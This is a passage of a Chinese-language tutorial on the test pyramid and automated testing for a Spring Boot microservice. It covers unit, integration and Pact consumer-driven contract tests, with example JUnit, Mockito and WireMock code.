准备上生产环境的软件在上生产之前需要进行测试。随着软件开发行业的成熟,软件测试方法也日趋成熟。开发团队正在逐渐自动化大部分的测试,以此取代大量测试人员手工测试。通过自动化测试,开发团队可以分分钟就知道他们的软件是否被破坏,而不是后知后觉几天后才知道。

自动化测试极大地缩短了反馈周期,这与敏捷开发实践、持续集成、DevOps 文化等是一脉相承的。拥有高效的软件测试方法,可以让你的团队快速而自信地前行。

本文将探讨一个具备高响应力的、可靠并且可维护的测试组合应该如何构建,这与你具体构建的是一个微服务架构、移动应用程序或者物联网生态系统都无关。此外,我们还将详细介绍如何写出高效且可读的自动化测试。

(测试)自动化的重要性

软件已经成为我们日常生活中的一个重要组成部分。早期它仅仅用于提高企业的效率,但如今它的作用远不止如此。如今许多公司都想方设法成为一流的数字化公司。作为用户,我们每天使用的软件越来越多。创新的车轮正加速向前滚动。

如果你想跟上时代的步伐,你必须研究如何在不牺牲质量的情况下更快地交付你的软件。持续交付——一种高度自动化的、确保你可以随时将软件发布到生产环境中的实践——正能帮你达到这个目的。它通过构建流水线自动测试你的软件,自动将其部署到测试和生产环境中。

软件的数量正以前所未有的速度增长,手动进行构建、测试和部署,很快就会变得不可能——除非你想把所有的时间都用来进行手动重复的工作,而不是用来开发可工作的软件。将一切自动化,从构建到测试,从部署到基础架构,这是你唯一的出路。

(使用构建流水线来自动并可靠地将你的软件部署到生产环境)

传统的软件测试过于依赖手工操作:首先将应用程序部署到测试环境,然后执行一些黑盒测试,例如,通过点击用户界面来查看一切是否工作如常。通常这些测试将由文档指定,以确保测试人员每次测试的内容是一致的。

很明显,手动测试所有更改非常耗时、重复而且繁琐。重复很无趣,无趣就容易犯错,这样子还没测到这周工作结束你就会想找下一份工作了。

幸运的是,重复性劳动还是有药可治的:自动化。

自动化繁琐重复的测试将给软件开发人员的生活带来重大改变。自动化这些测试后,你就不需要再一味遵循测试文档点点点以确保软件是否仍正常工作。自动化这些测试,你可以充满自信地修改你的代码。如果你曾试过在没有适当自动化测试的情况下进行大规模重构,那你应该知道这种体验多么恐怖。你怎么知道你是否意外地破坏了某些功能呢?显然,你需要将所有的测试用例手动点一遍。不过老实说,你真的享受这个过程吗?你想象一下,如果你对代码做了大规模改动后惬意地喝了一口咖啡,喝完咖啡后就能马上得知你的改动有没有破坏原有功能。这样的开发体验是不是听起来就让人舒服多了?

测试金字塔

如果你真的想为你的软件构建自动化测试,你必须知道一个关键的概念:测试金字塔。Mike Cohn 在他的着作《Succeeding with Agile》一书中提出了这个概念。这个比喻非常形象,它让你一眼就知道测试是需要分层的。它还告诉你每一层需要写多少测试。

(测试金字塔)

根据 Mike Cohn 的测试金字塔,你的测试组合应该由以下三层组成(自下往上分别是):

  • 单元测试
  • 服务测试
  • 用户界面测试

不幸的是,如果你仔细思考就会发现,测试金字塔的概念有点太短了。有人认为,Mike Cohn 的测试金字塔里的命名或某些概念不是最理想的。我也同意这一点。从当今的角度来看,测试金字塔似乎过于简单了,因此可能会产生误导。

然而,由于其简洁性,在建立你自己的测试组合时,测试金字塔本身是一条很好的经验法则。你最好记住 Cohn 测试金字塔中提到的两件事:

  • 编写不同粒度的测试
  • 层次越高,你写的测试应该越少

为了维持金字塔形状,一个健康、快速、可维护的测试组合应该是这样的:写许多小而快的单元测试。适当写一些更粗粒度的测试,写很少高层次的端到端测试。注意不要让你的测试变成冰淇淋那样子,这对维护来说将是一个噩梦,并且跑一遍也需要太多时间。

不要太拘泥于 Cohn 测试金字塔中各层次的名字。事实上,它们可能相当具有误导性:服务测试是一个难以掌握的术语(Cohn 本人说他观察到很多开发人员完全忽略了这一层)。在单页应用框架(如 react,angular,ember.js 等)的时代,UI 测试显然不必位于金字塔的最高层,你完全能够用这些框架对 UI 进行单元测试。

考虑到原始名称的缺点,只要在你的代码库和团队讨论中达成一致,你完全可以为测试层次提供其他名称。

我们将使用的工具和库

  • JUnit : 测试执行库
  • Mockito: 模拟依赖
  • Wiremock: 为外部服务打桩
  • Pact: 用于编写消费者驱动的契约测试
  • Selenium: 用于编写用户界面驱动的端到端测试
  • REST-assured: 用于编写 REST API 驱动的端到端测试

示例应用

我已经写好了一个简单的微服务应用,其中涵盖了测试金字塔各种层次的测试。

示例应用体现了一个典型的微服务的特点。它提供了一个 REST 接口,与数据库进行通信并从第三方 REST 服务中获取信息。它是使用 Spring Boot 实现的,即使你之前从未使用过 Spring Boot,它也简单到应该让你很容易理解。

请下载 Github 上的代码。Readme 里写了你在计算机上运行应用程序及其自动化测试所需的说明。

功能

应用的功能十分简单。它提供了三个 REST 接口:

  • GET /hello 总是返回”Hello World”
  • GET /hello/{lastname} 根据 lastname 来查询人,如果查到了结果将返回”Hello {Firstname} {Lastname}”
  • GET /weather 返回现在德国汉堡的天气情况

高层架构

从高层次来看,这个系统的结构是这样:

(我们微服务系统的高层架构)

我们的微服务提供了一个可以通过 HTTP 调用的 REST 接口。对于某些接口,服务将从数据库获取信息。在其他情况下,服务将通过 HTTP 调用外部天气 API来获取并显示当前天气状况。

内部架构

在内部,Spring Service 有一个典型的 Spring 架构:

(我们微服务的内部架构)

  • Controller 提供 REST 接口,处理 HTTP 请求和响应
  • Repository 和数据库打交道,关注数据在持久化存储里的读写操作
  • Client 和别的 API 交互,在我们的应用里它会通过 HTTPS 从 darksky.net 获取天气情况
  • Domain 这是我们的领域模型,它包含了领域逻辑(相对来说,在我们的示例中不甚重要)

有经验的 Spring 开发人员可能会注意到这里缺失了一个常用的层次:受Domain-Driven Design的启发,很多开发人员通常会构建一个由服务类组成的服务层。我决定不在这个应用中包含服务层。原因之一是我们的应用程序很简单,服务层只会成为一个不必要的中间层。另一个是我认为人们过度使用服务层。我经常遇到在服务类中写了全部业务逻辑的代码库。领域模型仅仅成为数据层,而不是行为(贫血域模型)。对于每一个稍有复杂度的应用来说,这浪费了很多让代码保持结构良好且易于测试的优秀方案,并且没能充分利用面向对象的威力。

我们的 repositories 非常简单,它提供简单的 CRUD 功能。为了保持代码简单,我使用了 Spring Data。 Spring Data 为我们提供了一个简单而通用的 CRUD 实现,我们可以直接使用而不需再造轮子。它还负责为我们的测试启动一个内存数据库,而不是像生产中一样使用真正的 PostgreSQL 数据库。

看看代码库,熟悉一下内部结构。这将有助于我们的下一步:测试我们的应用!

单元测试

单元测试将成为你测试组合的基石。你的单元测试保证了代码库里的某个单元(被测试的主体)能按照预期那样工作。单元测试在你的测试组合里测试的范围是最窄的。它的数量在测试组合中应该远远多于其他类型的测试。

(一个用测试替身隔绝了外部依赖的典型单元测试)

一个单元指的是什么?

如果你去问三个人同样的问题:“单元”在单元测试的上下文中意味着什么,你很可能会获得四种非常相似的答案。某种程度上讲,对“单元”的定义取决于你自己,因此这个问题没有标准答案。

如果你正在使用函数式语言,一个单元最有可能指的是一个函数。你的单元测试将使用不同的参数调用这个函数,并断言它返回了期待的结果。在面向对象语言里,下至一个方法,上至一个类都可以是一个单元(从一个单一的方法到一整个的类都可以是一个单元)。

群居和独居

一些人主张,应该将被测试主体下的所有合作者(比如在测试里被你的类调用的其他类)都使用模拟或者桩替换掉,这样可以建立完美的隔离,避免副作用和复杂的测试准备。而有些人主张,只有那些执行起来很慢或者有较大副作用的合作者(比如读写数据库或者发送网络请求的类)才应该被模拟或者打桩替代。

偶尔有人会把用桩隔离所有依赖的测试称为独居单元测试,把和依赖有交互的测试成为群居单元测试(Jay Fields 的《Working Effectively with Unit Tests》这本书里创造了这些概念)。如果有空你可以继续深究下去,读一读不同思想流派各自的利弊在哪。

说到底,决定采用群居方式还是独居方式的单元测试其实并不重要。写自动化测试才是重要的。就我自己而言,我发现我自己经常两种方式都用。如果使用真正的合作者很麻烦,我就会用模拟对象或者桩。如果我觉得引用真正的合作者能让我对测试更有信心,我会仅仅打桩替代掉 service 最外层的依赖。

模拟和打桩(这里以及下文的桩都指 stub)

模拟对象和桩是两种不一样的测试替身(测试替身还不止这两种)。很多人会混用模拟对象和桩这两个概念。我认为,准确的用词会好点,并且最好能将它们各自的特性谙熟于心。你可以使用测试替身来替换掉真实的对象,给它一个可以更方便测试的实现。

换句话说,这意味着你是用一个假的实现来代替真的那个(例如,一个类,一个模块或者一个函数)。这个假的实现外表和行为和真的很像(都能响应同样的方法调用),只不过真实的响应内容是你在单元测试开始前就定义好的。

并不是在单元测试时我们才使用测试替身。还有很多精妙的测试替身能以非常可控的方式来模拟整个系统的功能。然而,在单元测试里使用模拟对象和桩的概率会更高(取决于你是喜欢群居风格还是独居风格的开发者),这主要是因为现代语言和库使得构建模拟对象和桩变得更加简单了。

不管你的技术选型是怎么样的,一般来说,编程语言的标准库或一些比较有名的三方库都会提供一些优雅的方式来帮你构建 mocks。即使需要自己编写 mock 对象,也只是写一个假类/模块/函数的事,只需要让它与真实的合作者有相同的签名,并设置到你的测试中去即可。

你的单元测试跑起来应该非常快。在一般的机器上跑完数千个单元测试应该只需要几分钟。为了得到快速的单元测试,你应该独立地测试代码库的每一小块,并避免进行真实的数据库操作、文件系统操作,或者发送真实的 HTTP 请求(使用模拟对象和桩来隔离这一部分)。

一旦你掌握了写单元测试的诀窍,你写起来就能越来越顺畅。打桩隔离掉外部依赖,准备一些输入数据,调用被测试的主体,然后检查返回值是不是你所期待的。看看测试驱动开发,让单元测试指引你的开发;如果使用得当,测试驱动开发将帮你进入一个非常顺畅的工作流,它能帮你创造出一个良好且可维护的设计,顺便还能送你一套全面且自动化的测试。当然,测试驱动开发并不是银弹。但是建议你尝试一下,看看它是否适合你。

应该测试什么?

单元测试有个好处,就是你可以为所有的产品代码类写单元测试,而不需要管它们的功能如何,或者它们在内部结构中属于哪个层次。你可以对 controller 进行单元测试,也可以用同样的方式对 repository、领域类或者文件读写类进行单元测试。良好的开端,从坚持一个实现类就有一个测试类的法则开始。

一个单元测试类至少应该测试这个类的公共接口。私有方法不能直接测试的原因是你不能从测试类直接调用它们。受保护的和包私有的方法可以被测试类直接调用(如果测试类和生产代码类的包结构是一样的),但是测试这些方法可能就太过了。

编写单元测试有一条细则:它们应该保证你代码所有的路径都被测试到(包括正常路径和边缘路径)。同时它们不应该和代码的实现有太紧密的耦合。

为什么这样说呢?

测试如果与产品代码耦合太紧,很快就会令人讨厌。当你重构代码时(快速回顾一下:重构意味着改变代码的内部结构而不改变其对外的行为)你的单元测试就会挂掉。

这样的话你就损失了单元测试的一大好处:充当代码变更的保护网。你很快就会厌烦这些愚蠢的测试,而不会感到它能带来好处,因为你每次重构测试就会挂掉,带来更多的工作量。不过说起来这些愚蠢的测试又是谁把它写成这样的呢?

那么正确的做法是什么?是不要在你的单元测试里耦合实现代码的内部结构。要测试可观测的行为。你应该这样思考:

如果我的输入是 x 和 y,输出会是 z 吗?

而不是这样:

如果我的输入是 x 和 y,那么这个方法会先调用 A 类,然后调用 B 类,接着输出 A 类和 B 类返回值相加的结果吗?

私有方法应该被视为实现细节。这就是为什么你不应该有去测试他们的冲动。 我经常听单元测试(或者 TDD)的反对者说,编写单元测试是无意义的工作,因为为了获得一个高的测试覆盖率,你必须测试所有的方法。他们经常引用这样的场景:一个过于激昂的团队领导强硬地让他们为 getter、setter 及其他所有琐碎的代码施加测试,以达到 100%的测试覆盖率。

这就大错特错啦。

确实你应该测试公共接口。但是更重要的是,不要去测试微不足道的代码。别担心,Kent Beck 说这样是 OK 的。你不会因为测试 getter,setter 抑或是其他简单的实现(比如没有任何条件逻辑的实现)而得到任何价值。把时间省出来,你就能多参加一个会了,万岁!

测试结构

一个好的测试结构(不局限于单元测试)是这样的:

  1. 准备测试数据
  2. 调用被测方法
  3. 断言返回的是你期待的结果

这里有个口诀可以帮你记住这种结构:“Arrange,Act,Assert”。另一个口诀则是从 BDD 获取的灵感。就是“given”,“when”,“then”三件套,given 说的是准备数据,when 指的是调用方法,then 则是断言。

这种模式也可以应用于其他更高层次的测试。在任何情况下,它们都能让你的测试保持一致,易于阅读。除此之外,使用这种结构写出来的测试,往往更简短,更具表达力。

实现一个单元测试

知道了测什么、如何组织单元测试后,我们终于可以看一个真正的例子了。 让我们来看一个简化版的 ExampleController 类:

@RestController
public class ExampleController {

    private final PersonRepository personRepo;

    @Autowired
    public ExampleController(final PersonRepository personRepo) {
        this.personRepo = personRepo;
    }

    @GetMapping("/hello/{lastName}")
    public String hello(@PathVariable final String lastName) {
        Optional<Person> foundPerson = personRepo.findByLastName(lastName);

        return foundPerson
                .map(person -> String.format("Hello %s %s!",
                        person.getFirstName(),
                        person.getLastName()))
                .orElse(String.format("Who is this '%s' you're talking about?",
                        lastName));
    }
}

一个针对hello(lastname)方法的单元测试可能是这样的:

public class ExampleControllerTest {

    private ExampleController subject;

    @Mock
    private PersonRepository personRepo;

    @Before
    public void setUp() throws Exception {
        initMocks(this);
        subject = new ExampleController(personRepo);
    }

    @Test
    public void shouldReturnFullNameOfAPerson() throws Exception {
        Person peter = new Person("Peter", "Pan");
        given(personRepo.findByLastName("Pan"))
            .willReturn(Optional.of(peter));

        String greeting = subject.hello("Pan");

        assertThat(greeting, is("Hello Peter Pan!"));
    }

    @Test
    public void shouldTellIfPersonIsUnknown() throws Exception {
        given(personRepo.findByLastName(anyString()))
            .willReturn(Optional.empty());

        String greeting = subject.hello("Pan");

        assertThat(greeting, is("Who is this 'Pan' you're talking about?"));
    }
}

我们写单元测试用的是JUnit,Java 实际意义上的标准测试框架。我们使用Mockito来打桩隔离掉真正的PersonRepository类。这个桩允许我们在测试里重新定义 PersonRepository 被调用后产生的响应。桩能让我们的测试更简单,更可预测,更容易组织测试数据。

依照 Arrange,Act,Assert 的结构,我们写了两个单元测试:一个是正常的场景,另一个是找不到搜索人的场景。首先,正常场景创建了一个新的 person 对象,然后告诉 mock 类,当你接受到以“Pan”作为参数的调用时,返回这个 person 对象。这个测试接着调用了被测试方法。最后它断言返回值是等于期待结果的。

第二个测试和第一个类似,但它测试的是被测方法找不到对应人名时的场景。

集成测试

所有常见的应用都会和一些外部环境做集成(数据库,文件系统,向其他应用发起网络请求)。为了使测试有更好的隔离、运行更快,我们通常不会在编写单元测试时涉及这些外部依赖。不过,这些交互始终是存在的,它们也需要被测试覆盖到。这正是集成测试的用处所在。它们测试的是应用与所有外部依赖的集成。

对于自动化测试来说,不仅需要运行自己的应用,也需要运行与之集成的组件。如果要测试和数据库的集成,那就需要在跑测试的时候运行数据库。如果要测试能否从硬盘里读取文件,就需要先保存一个文件到硬盘上,然后在集成测试中去读取它。

前面我提到过「单元测试」是一个模糊的术语,对于集成测试而言,更是如此。对于一些人来讲,集成测试意味着去测试和多方应用产生交互的整个应用。我理解的集成测试更加狭义:每次只测试一个集成点。测试时应使用测试替身来替代其他的外部服务、数据库等。同时,使用契约测试对测试替身和真实实现进行覆盖。这样出来的集成测试更快,更独立,更易理解和调试。

狭义的集成测试测的是服务的边界。从概念上来说,这样的测试总是在触发导致应用和外部依赖(文件系统,数据库,其他服务等)集成的行为。比如说,一个数据库集成测试可能会这么写:

(一个集成了你的代码和数据库的集成测试)

  1. 启动数据库
  2. 连接应用到数据库
  3. 调用被测函数,该函数会往数据库写数据
  4. 读取数据库,查看期望的数据是不是被写到了数据库里

另一个例子,一个通过 REST API 和外部服务集成的测试可能是会这么写:

(这种集成测试检查了应用是否能正确和外部服务通信)

  1. 启动应用
  2. 启动一个被测外部服务的实例(或者一个具有相同接口的测试替身)
  3. 调用被测函数,该函数会从外部服务的 API 读取数据
  4. 检查应用是否能正确解析返回结果

与单元测试一样,集成测试也可以写得很白盒。一些框架在应用启动后,仍然支持对应用的一些部分进行 mock。 这使得你可以去检查正确的交互是否发生。

代码中所有涉及数据序列化和反序列化的地方都要写集成测试。这些场景可能比你想象得更多,比如说:

  • 调用自身服务的 REST API
  • 读写数据库
  • 调用外部服务的 API
  • 读写队列
  • 写入文件系统

为这些边界编写集成测试,保证了对外部系统的数据读写操作是正常工作的。

编写狭义的集成测试时,你应该尽可能在本地运行外部依赖,如启动一个本地的 MySQL 数据库、针对本地的 ext4 文件系统进行测试等。如果是与外部服务集成,可以在本地运行该服务的实例,或构建一个模拟真实服务的假服务,并在本地运行。

如果有些三方服务,你没法在本地运行一个实例,那么可以考虑运行一个专用实例,并在集成测试中指向它。避免在自动化测试里集成真实的生产环境的服务。在生产环境上爆出上千个测试请求是个惹人生气的好办法,因为你会扰乱日志(这是最好的情况),最坏的情况是你会对该服务产生 DoS 攻击。透过网络和一个服务集成是广义集成测试的一大特征,这会让你的测试更慢,通常也更难编写。

在测试金字塔中,集成测试的层级比单元测试更高。集成缓慢的外部依赖(如文件系统或数据库等)通常比隔离了这些依赖的单元测试需要更长时间。他们可能比小型并且独立的单元测试难写,毕竟你需要让外部依赖在你的测试中运行起来。然而,它的优势在于建立了你对应用能正确访问外部依赖的自信,这是单纯的单元测试做不到的。

数据库集成

PersonRepository 是代码里唯一的数据库类。它依赖于Spring Data,我们并没有实际去实现它。只需要继承CrudRepository接口并声明一个方法名。剩下的就是 Spring 魔法了,Spring 会帮我们实现其他所有的东西。

public interface PersonRepository extends CrudRepository<Person, String> {
    Optional<Person> findByLastName(String lastName);
}

对于CrudRepository接口,Spring Boot 提供了完整的 CRUD 方法例如findOne, findAll, save, update和delete。我们自定义的方法(findByLastName())继承了这些基础功能并实现了根据 last name 获取 Persons 对象的功能。Spring Data 会解析方法的返回类型,并按照命名规范解析方法名,从而决定如何实现方法。

虽然 Spring Data 已经实现了和数据库交互的功能,我还是写了一个数据库集成测试。你可能会反对,认为这是在测试框架,而我们应该避免测试不属于我们开发的代码。然则,我坚信在这里写一个集成测试是至关重要的。首先它测试了我们自定义的 findByLastName 方法实际的行为如我们所愿。次之,它证明了我们的数据库类正确地使用了 Spring 的装配特性,它是能正确连接到数据库的。

为了让你能更容易在本地把测试运行起来(而不必真的装一个 PostgreSQL 数据库),我们的测试会连接到一个内存H2数据库。

我已经在build.gradle里定义 H2 作为测试依赖。而测试目录下的application.properties没有定义任何spring.datasource属性。这会告诉 Spring Data 使用内存数据库,它会在 classpath 里找到 H2 来跑我们的测试。

当你用 int profile 真正启动应用时(例如把SPRING_PROFILES_ACTIVE=int设置到环境变量里),它会连接到application-int.properties里定义的 PostgreSQL 数据库。

我知道这涉及到了很多 Spring 的知识。你必须仔细阅读许多文档才能理解这个例子。实现代码只有几行,非常直观,但是如果你不知道 Spring 的一些知识点是很难加以理解的。

除此以外,测试使用内存数据库其实是有风险的。毕竟我们集成测试针对的数据库和我们生产用的数据库不一样。你可以自己选择,是利用 Spring 的强大能力获得简洁的代码,亦或者是写显式但较为冗长的实现。

解释已经足够多了,这里有一个集成测试的例子。它先保存了一个 Person 对象到数据库里,然后根据 last name 去查找它。

@RunWith(SpringRunner.class)
@DataJpaTest
public class PersonRepositoryIntegrationTest {
    @Autowired
    private PersonRepository subject;

    @After
    public void tearDown() throws Exception {
        subject.deleteAll();
    }

    @Test
    public void shouldSaveAndFetchPerson() throws Exception {
        Person peter = new Person("Peter", "Pan");
        subject.save(peter);

        Optional<Person> maybePeter = subject.findByLastName("Pan");

        assertThat(maybePeter, is(Optional.of(peter)));
    }
}

你可以看到我们的集成测试像单元测试那样遵循了arrange, act, assert的结构。我说过这是一个普适的概念吧。

和外部服务集成

我们的微服务会调用darksky.net——一个关于天气的 REST API。当然啦,我们希望保证服务调用时能发送正确的请求,并且能正确地解析响应。

跑自动化测试时,我们希望避免真实地调用darksky的服务。当然,我们使用的免费版有调用次数限制,这是个原因。但真正的原因是要去耦合。我们的测试应该能独立运行,而不需要管 darsky.net 可爱的开发者们在干些啥。即使我们的机器访问不到darksky服务器,或darksky服务器在进行宕机维护,都不应该使我们的测试挂掉。

我们可以在集成测试中用自己的假darksky服务器来代替真正的服务器。这听起来像是个巨大的任务。幸亏有像Wiremock这样的工具,事情变得很简单。看这里:

@RunWith(SpringRunner.class)
@SpringBootTest
public class WeatherClientIntegrationTest {

    @Autowired
    private WeatherClient subject;

    @Rule
    public WireMockRule wireMockRule = new WireMockRule(8089);

    @Test
    public void shouldCallWeatherService() throws Exception {
        wireMockRule.stubFor(get(urlPathEqualTo("/some-test-api-key/53.5511,9.9937"))
                .willReturn(aResponse()
                        .withBody(FileLoader.read("classpath:weatherApiResponse.json"))
                        .withHeader(CONTENT_TYPE, MediaType.APPLICATION_JSON_VALUE)
                        .withStatus(200)));

        Optional<WeatherResponse> weatherResponse = subject.fetchWeather();

        Optional<WeatherResponse> expectedResponse = Optional.of(new WeatherResponse("Rain"));
        assertThat(weatherResponse, is(expectedResponse));
    }
}

为了使用 Wiremock,我们在固定的端口(8089)实例化了一个WireMockRule。使用领域特定语言,我们可以配置一个 Wiremock 服务器,定义它需要监听的路径并设置相应的应答。

接着调用我们要测试的方法——它会调用第三方服务,然后检查结果是否能被正确解析。

理解测试怎样调用 Wiremock 服务器而不是真正的darksky很重要。秘密就在src/test/resources下的application.properties文件。这是 Spring 在运行测试时会加载的属性文件。出于测试目的——比如,调用一个假的 Wiremock 服务器而不是真实服务器——我们在这个文件里覆写了一些配置,如 API keys 和 URL 等: weather.url = http://localhost:8089

值得注意的一点是,这里声明的端口必须和我们在测试里实例化WireMockRule时的端口保持一致。我们之所以能为了测试注入一个假的 API url,是因为我们通过注入的方式将 url 传给了WeatherClient类的构造函数:

@Autowired
public WeatherClient(final RestTemplate restTemplate,
                     @Value("${weather.url}") final String weatherServiceUrl,
                     @Value("${weather.api_key}") final String weatherServiceApiKey) {
    this.restTemplate = restTemplate;
    this.weatherServiceUrl = weatherServiceUrl;
    this.weatherServiceApiKey = weatherServiceApiKey;
}

这样我们告诉WeatherClient要把我们定义在 application properties 的weather.url值赋给weatherUrl。

借助类似 Wiremock 这样的工具,为外部服务编写狭义的集成测试就变得很简单。不幸的是这种方式有个缺点:如何保证我们启动的假服务器与真的服务行为一致?按我们目前的实现,当外部服务改变了它的 API 时,我们的测试依然能跑过。现在我们仅仅测试了WeatherClient可以解析假服务器返回的应答信息。这是个好的开始,但是它非常脆弱。如果使用端到端测试,针对真实服务的实例运行测试,而不使用假的服务,固然能解决这个问题,但这又会让我们对被测服务的可用性产生依赖。幸运的是,针对这个难题还是有更好的方案:针对真实和假的服务运行契约测试。这能保证我们集成测试里用的假服务是个忠实的测试替身。下面来看看这种方案是怎么工作的。

契约测试

越来越多现代软件组织发现,对于增长的开发需求,可以让不同的团队来开发同一系统的不同部分。每个团队负责构建独立、松耦合的服务,团队间开发不互相影响。最终再将这些服务集成为一个大而全的系统。最近关于微服务的讨论日益热烈,关注的正是这一点。

将系统拆分成多个更小的服务,常常意味着这些服务之间需要通过确定的(最好是定义明确的,但有时候会有变动演进)接口通信。

不同应用间的接口可能形态各异,或基于不同的技术栈。常见的有:

  • 基于 HTTPS 使用 JSON 交互的 REST 接口
  • 基于类似gRPC的 RPC(Remote Procedure Call,远程进程调用)接口
  • 使用队列构建的事件驱动架构

对于任意一个接口,一定会涉及两个实体:提供方和消费方。提供方为消费方提供数据。消费方处理来自提供方的数据。在 REST 世界里,提供方为所有要暴露的 API 创建一个 REST API;消费方则调用这些 API 来获取数据,或进一步触发其他的服务。而在一个由异步、事件驱动的世界,提供方(通常被称为发布者)发布数据到一个队列中;消费方(通常被称为订阅者)订阅这些队列,读取并处理相关数据。

(每一个接口都有提供方(或者发布者)和消费方(或者订阅者)实体。接口之间的规范可以视为是一个契约。)

当你把服务消费方和服务提供方分散到不同的团队去时,你就需要清楚地了解这些服务之间的接口(也就是我们所讲的契约)。传统的公司一般是通过以下的方式解决这个问题:

  • 写一个钜细靡遗的接口文档(就是契约)
  • 根据定义好的契约实现提供方服务
  • 把接口文档扔给隔壁的消费团队
  • 等。等到消费方团队实现接口消费部分的工作
  • 运行一些大型的、手动的系统测试,保证软件能正常工作
  • 祈祷双方团队永远都维持接口定义不变,不要把事情搞砸

越来越多现代软件开发团队已经把第五步和第六步用更加自动化的方式来替代:自动化契约测试保证了消费方和提供方实现的时候依然遵循契约。这种测试提供了一个良好的回归测试组合,保证契约的变更能被及早发现。

在现代敏捷组织,你应该选择效率高浪费少的路子。你们是在同一个公司里构建应用。比起扔出去一个面面俱到的文档,与其他服务的开发者们直接交流本应容易得多。毕竟他们是你的同事,而不是一个只能通过客户支持或合同进行沟通的第三方供应商。

消费方驱动的契约测试(Consumer-Driven Contract tests,CDC 测试)是让消费方驱动契约实现。使用 CDC,接口消费方会写测试,检查接口是不是返回了他们想要的所有数据。消费方团队会发布这些测试从而让提供方可以轻松获取到这些测试并执行。提供方团队现在可以一边运行 CDC 测试一边开发他们的 API 了。一旦所有测试通过,他们就知道已经实现了所有消费方想要的东西。

(契约测试保证了提供方和所有的消费方基于同一个定义好的接口契约。用 CDC 测试,消费者就可以通过自动化测试发布他们的需求,提供方则可以持续不断获取这些测试并执行)

这种方式允许提供方团队只实现必要的东西(让设计保持简约,YAGNI等)。提供方团队需要持续地获取并运行这些 CDC 测试(从他们的构建 Pipeline 里),从而能立即发现任何打破契约的代码变更。如果有代码变更破坏了接口,CDC 测试应该会执行失败,这样可以防止破坏性改动上线。当这些测试保持通过,团队就可以做任何他们想做的改动而不需要担心其他团队。使用消费方驱动测试的话,一般过程会是这样的:

  • 消费方团队根据他们期待的结果编写自动化测试
  • 发布自动化测试给提供方团队
  • 提供方持续不断地运行这些测试,并保持他们都能通过
  • 如果 CDC 测试挂掉了,则需要双方进行沟通

如果你的组织正在践行微服务,那么拥有 CDC 测试将是迈向自治团队的一大步。CDC 测试是一种促进团队交流的自动化途径。它们保证了团队间的接口能一直如期工作。如果有 CDC 测试挂掉,则可能是个好的信号,意味着你应该走过去到那个被测试影响的团队,了解他们最近是否有 API 变更,弄清楚你们希望如何处理这些变更。

一个稚嫩的 CDC 测试实现非常简单,比如说你可以对一个 API 发送请求,并断言响应中包含了你需要的所有东西。然后你把这些测试打包成可执行文件(.gem, .jar, .sh),并将它们上传到一个其他团队可以获取到的地方(例如一些诸如Artifactory这样的仓库)。

在过去几年里,CDC 正变得越来越受欢迎。同时也涌现了一些工具,使得编写及上传 CDC 更加简单。

在这些工具中,Pact可能是最显眼的一个了。它为编写提供方或消费方的测试提供了详尽的支持,为外部服务隔离提供了开箱即用的(打)桩工具,它还支持你与其他团队交换 CDC 测试。Pact 已经被移植到很多平台上,并且可以和 JVM 语言一起使用,例如 Ruby,.NET,JavaScript 等等。

如果你想开始编写 CDC 测试但不知道怎么开始,不妨试试 Pact。文档一开始可能会让你应接不暇。保持耐心克服一下。它能帮助你深刻理解 CDC 测试,也会让你更容易在团队合作时推行 CDC。

消费方驱动契约测试真的可以说是建立自治团队的基石,它让这样的团队充满自信,快速前行。不要掉队,好好读读相关的文档,尝试一下。一套稳固的 CDC 测试集非常宝贵,它让你能快速开发,同时又不会挂掉已有的服务,引起其他团队的不满。

消费方测试(我方团队)

上面的例子中,我们的微服务消费了天气 API。所以我们有责任写一个消费方测试来定义我们期望从 API 契约中获得的结果。

首先,我们要在build.gradle里引入一个库来写基于协议的消费方测试:

testCompile('au.com.dius:pact-jvm-consumer-junit_2.11:3.5.5')

得益于这个库,我们可以用协议的仿造服务来实现一个消费方测试:

@RunWith(SpringRunner.class)
@SpringBootTest
public class WeatherClientConsumerTest {

    @Autowired
    private WeatherClient weatherClient;

    @Rule
    public PactProviderRuleMk2 weatherProvider =
            new PactProviderRuleMk2("weather_provider", "localhost", 8089, this);

    @Pact(consumer="test_consumer")
    public RequestResponsePact createPact(PactDslWithProvider builder) throws IOException {
        return builder
                .given("weather forecast data")
                .uponReceiving("a request for a weather request for Hamburg")
                    .path("/some-test-api-key/53.5511,9.9937")
                    .method("GET")
                .willRespondWith()
                    .status(200)
                    .body(FileLoader.read("classpath:weatherApiResponse.json"),
                            ContentType.APPLICATION_JSON)
                .toPact();
    }

    @Test
    @PactVerification("weather_provider")
    public void shouldFetchWeatherInformation() throws Exception {
        Optional<WeatherResponse> weatherResponse = weatherClient.fetchWeather();
        assertThat(weatherResponse.isPresent(), is(true));
        assertThat(weatherResponse.get().getSummary(), is("Rain"));
    }
}

如果观察得仔细,你会发现WeatherClientConsumerTest和WeatherClientIntegrationTest很相似。这次我们用 Pact 取代了 Wiremock 来对服务器打桩。事实上消费方测试工作方式与集成测试完全一致:我们用打桩的方式隔离第三方服务,定义我们期望的响应,然后检查我们的客户端可以正确处理响应。从这个意义上讲,WeatherClientConsumerTest本身就是一个狭义的集成测试。这种方式相比使用 Wiremock 好在,它每次运行都会创建一个协议文件(会生成到target/pacts/&pact-name>.json)。这个协议文件使用特殊的 JSON 格式描述了这个契约的期望结果,它可以被用来验证我们打桩的服务与真实服务行为确实是一致的。我们可以把这个协议文件交给提供 API 的团队,他们可以根据这个文件的期望输出来编写提供方测试。这样的话他们就能测试,他们的 API 是不是满足我们期望的所有结果。

消费方通过描述他们的期望结果来驱动接口实现,这就是 CDC 里消费方驱动所想要表达的意思。提供方必须保证他们满足了所有期望结果。没有过度设计,保持简洁。 把 Pact 文件交给提供方团队可以有几种方式。一种简单方式就是把它们加入到版本控制系统里,告诉提供方永远拉取最新的文件即可。更先进一点的方式则是用一个文件仓库,类似 Amazon S3 这样的服务或者 pact broker。起步迅速,按需拓展。

在真实的软件中,你并不需要为一个客户端类既写集成测试又写消费方测试。上面的示例代码同时包含了这两种测试,只是想告诉你这两种测试的写法。如果你想用协议来写 CDC 测试,我推荐你只写消费方测试。两种测试的编写成本是一样的。用协议的方式就有协议文件这个好处,这样把协议文件递交给其他团队,他们就能很容易实现他们的提供方测试。当然这取决于你能说服其他团队也使用协议。如果不行,那么用 Wiremock 来实现集成测试可以作为替代方案。

提供方测试(其他团队)

提供方测试必须由提供天气 API 的团队来实现。我们消费的是 darksky.net 提供的一个公共 API。理论上 darksky 团队会实现提供方测试,以保证不打破他们应用和我们的服务之间的契约。

